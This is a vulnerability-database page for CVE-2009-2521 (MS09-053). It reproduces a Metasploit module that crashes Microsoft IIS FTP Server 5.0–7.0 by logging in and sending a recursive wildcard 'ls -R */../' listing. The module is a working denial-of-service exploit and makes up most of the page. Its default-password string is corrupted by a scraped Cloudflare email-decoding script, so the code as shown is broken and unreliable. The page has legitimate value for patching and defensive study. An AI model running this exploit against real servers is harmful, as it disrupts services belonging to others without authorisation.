Vulners
Lucene search
Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053] | 3 Jul 201100:00 | – | zdt |
 | CVE-2009-2521 | 4 Sep 200900:00 | – | circl |
 | Microsoft IIS FTP Server Recursive Listing Denial of Service (CVE-2009-2521; CVE-2009-3023) | 8 Sep 200900:00 | – | checkpoint_advisories |
 | CVE-2009-2521 | 4 Sep 200910:00 | – | cve |
 | CVE-2009-2521 | 4 Sep 200910:00 | – | cvelist |
 | Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit) | 3 Jul 201100:00 | – | exploitdb |
 | Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit) | 3 Jul 201100:00 | – | exploitpack |
 | Microsoft IIS FTP Server LIST Stack Exhaustion | 26 Nov 201119:30 | – | metasploit |
 | CVE-2009-2521 | 4 Sep 200910:30 | – | nvd |
 | Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) | 15 Oct 200900:00 | – | openvas |
10
# Exploit Title: [MS09-053] Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS
# Date: Jul 03, 2011
# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://www.microsoft.com/
# Version: 5.0 - 7.0
# Tested on: unpatched version of windows xp & 2k3
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS FTP Server <= 7.0 LIST Stack Exhaustion Denial of Service',
'Description' => %q{
This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. This exploit is especially meant for the service which is configured as "manual" mode in startup type.
},
'Author' => [
'Nikolaos "Kingcope" Rangos', # Bug Discoverer
'Myo Soe <YGN Ethical Hacker Group, http://yehg.net/>' # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1.0 $',
'References' =>
[
[ 'CVE', '2009-2521'],
[ 'BID', '36273'],
[ 'OSVDB', '57753'],
[ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']
],
'DisclosureDate' => 'Sep 03 2009'))
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', '[email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>' ])
])
end
def run
return unless connect_login
print_status("Sending DoS packets ...")
send_cmd_data(['ls','-R */../'],nil)
disconnect
print_good("Done")
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jul 2011 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.60775